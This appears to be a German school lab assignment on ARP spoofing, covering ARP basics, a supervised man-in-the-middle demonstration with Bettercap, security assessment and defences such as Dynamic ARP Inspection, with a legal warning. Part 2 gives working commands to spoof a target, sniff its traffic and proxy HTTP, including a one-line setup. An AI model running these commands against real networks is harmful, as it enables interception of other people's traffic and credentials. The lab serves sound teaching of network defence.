ARP‑Spoofing – Konzept, Beobachtung und Sicherheitsbewertung
Lernziele und Kompetenzen
- verstehen, warum ARP Spoofing technisch möglich ist
- erkennen, wie ein Man‑in‑the‑Middle entsteht
- beobachten, wie Datenverkehr umgeleitet wird
- beurteilen, warum ARP ein Sicherheitsproblem darstellt
- geeignete Schutzmaßnahmen erklären können
Voraussetzungen
- Bettercap installiert: bettercap | bettercap (z.B. mittels Kali Linux)
Aufgabenbeschreibung
❗ Die Übung ist als geführte Demonstration oder kontrollierte Laborübung gedacht – nicht zur Anwendung in realen Netzwerken.
Versuchsaufbau (Konzeptuell)
Rechtliche Aspekte: MITM-Angriffe ohne ausdrückliche Erlaubnis sind illegal und strafbar. Verwende Bettercap nur in eigenen Lab-Umgebungen, bei Penetrationstests mit schriftlicher Genehmigung oder zu Lernzwecken.
Moderne Netzwerke (mit Dynamic ARP Inspection, Port Security, 802.1X, VPNs oder HTTPS Everywhere) machen klassische ARP-Spoofing-Angriffe oft unwirksam oder sehr auffällig.
IP-Forwarding muss aktiviert sein, damit der Traffic weitergeleitet wird:
Bash
echo 1 > /proc/sys/net/ipv4/ip_forward
Geräte
| Rolle | Beschreibung |
|---|---|
| Client | Normale Netzwerknutzung |
| Gateway | Router oder Server |
| Analyse‑PC | Führt ARP‑Manipulation durch |
| Optional | Wireshark‑PC |
Alle Geräte befinden sich im gleichen Subnetz.
Teil 1: Normalzustand analysieren
Aufgaben der Schüler:innen:
- ARP‑Tabelle des Clients betrachten
- Kommunikationsweg Client → Gateway beschreiben
- Erklären, wer welche MAC‑Adresse kennt
Zentrale Erkenntnis: ARP‑Einträge entstehen automatisch und werden vertraut.
Teil 2: Demonstration der ARP‑Manipulation
Grundlegender Ablauf für einen MITM-Angriff mit ARP Spoofing
- Bettercap starten
Bash
sudo bettercap -iface eth0 # oder wlan0 bei WiFi
(Ersetze eth0 durch dein Interface – mit ifconfig oder ip a herausfinden.)
- Netzwerk entdecken (Hosts finden) Im Bettercap-Prompt (>):
Bash
net.probe on # Aktives Scannen der Geräte
net.recon on # Passive Erkennung
Danach siehst du mit net.show eine Liste aller Geräte im Netzwerk (IP + MAC).
- ARP Spoofing aktivieren (der eigentliche MITM)
Bash
set arp.spoof.targets 192.168.1.50 # IP des Opfers (einzeln oder mehrere, kommagetrennt)
set arp.spoof.fullduplex true # Wichtig! Spooft in beide Richtungen (Opfer ↔ Gateway)
arp.spoof on
- fullduplex true → Der Traffic vom Opfer zum Internet und zurück wird umgeleitet.
-
Optional: set arp.spoof.internal true (nur internes Netzwerk).
-
Traffic sniffen (mitlesen)
Bash
net.sniff on
Bettercap zeigt nun in Echtzeit viele Pakete an (HTTP-Requests, Credentials usw.). Für detailliertere Analyse kannst du zusätzlich Wireshark starten.
- Angriff beenden
Bash
arp.spoof off
net.sniff off
Beispiel: Komplettes Einzeiler-Setup beim Start
Bash
sudo bettercap -iface eth0 -eval "
net.probe on;
set arp.spoof.targets 192.168.1.50;
set arp.spoof.fullduplex true;
arp.spoof on;
net.sniff on;
http.proxy on
"
Beobachtungsschwerpunkte:
- ARP‑Tabelle des Clients ändert sich
- Gateway‑IP verweist plötzlich auf falsche MAC
- Kommunikation funktioniert scheinbar normal
Diskussion:
- Warum merkt der Client nichts?
- Welche OSI‑Schichten sind betroffen?
- Warum ist das besonders gefährlich?
Teil 3: Datenverkehr sichtbar machen
- Netzwerkverkehr mitverfolgen
- Feststellen:
- Pakete passieren plötzlich ein drittes Gerät
- Inhalte (z. B. HTTP, DNS) sind sichtbar
- HTTPS vergleichen (sichtbar vs. verschlüsselt)
Lerneffekt: Verschlüsselung schützt Inhalte, nicht den Verkehrsweg.
Teil 4: Sicherheitsbewertung
- Warum ist ARP Spoofing im LAN möglich?
- Warum funktioniert es nicht über Router hinweg?
- Welche realen Angriffe nutzen dieses Prinzip?
- Warum ist reines Vertrauen im Netzwerk gefährlich?
Teil 5: Schutzmaßnahmen
Mindestens drei erklären, z. B.:
- Dynamic ARP Inspection (Switch‑basierend)
- Port Security
- VLAN‑Segmentierung
- Statische ARP‑Einträge (eingeschränkt)
- TLS / HTTPS
- Monitoring & IDS
Teil 6: Abschlussdiskussion
ARP‑Spoofing ist kein „Hack‑Trick“, sondern ein Protokollproblem.
- Warum wurde ARP so entworfen?
- Warum ist Sicherheit im LAN oft vernachlässigt?
- Warum ist Wissen darüber für Administratoren wichtig?
Abgabe
siehe allgemeine Abgaberegeln
Ergänzung:
Versuchsaufbau & Ausgangssituation
- Skizze des Netzwerks (Handzeichnung oder digital)
- IP‑ und MAC‑Adressen der Geräte
- Kurzbeschreibung des Normalzustands (Wie kommuniziert der Client mit dem Gateway?)
ARP im Normalbetrieb (Referenz)
- Screenshot der ARP‑Tabelle des Clients vor der Manipulation
- Kurze Erklärungen
Beobachtung der ARP‑Manipulation
- Technische Umsetzung mit Bettercap oder Ettercap
- Screenshot der veränderten ARP‑Tabelle des Clients
- Beschreibung in eigenen Worten und Erklärungen
Man‑in‑the‑Middle‑Wirkung
- Nachweis (z. B. Screenshot oder Wireshark‑Beobachtung), dass der Datenverkehr über ein drittes Gerät läuft
- Kurze Erklärungen
Sicherheitsbewertung / Schutzmaßnahmen / Abschlussbewertung
- Kurze Stellungnahme (3–5 Sätze) jeweils.
Bewertung
Gruppengröße: 1 Person
Maximale Punktezahl: 1
Maximale Punkteanzahl bei verspäteter Abgabe < 24h: 0,5
Maximale Punkteanzahl bei verspäteter Abgabe > 24h: 0
Quellen
- Introduction | bettercap - letzter Abruf 14.4.2026
- Man in the middle attack with bettercap | by Kiptryin | Medium - letzter Abruf 14.4.2026
- Bettercap | Hackviser - letzter Abruf 14.4.2026
- Kali Linux | Penetration Testing and Ethical Hacking Linux Distribution - letzter Abruf 14.4.2026
Pre-Read Material
| Datei | Typ | Größe | Geändert |
|---|---|---|---|
| 📕 PreRead Material - Subnetting.pdf | 910.85 KB | 2026-05-05 06:42 | |
| 📕 PreRead Material - Vermittlungsschicht.pdf | 2.73 MB | 2026-05-05 06:42 | |
| 📕 lost_in_space.pdf | 7.17 MB | 2026-05-05 06:42 |
Attachments
| Datei | Typ | Größe | Geändert |
|---|---|---|---|
| 📕 ccna1_chapter6.pdf | 791.53 KB | 2026-05-05 06:42 |
b9bf93b May 05, 2026 08:41:16 by Berndt Sevcik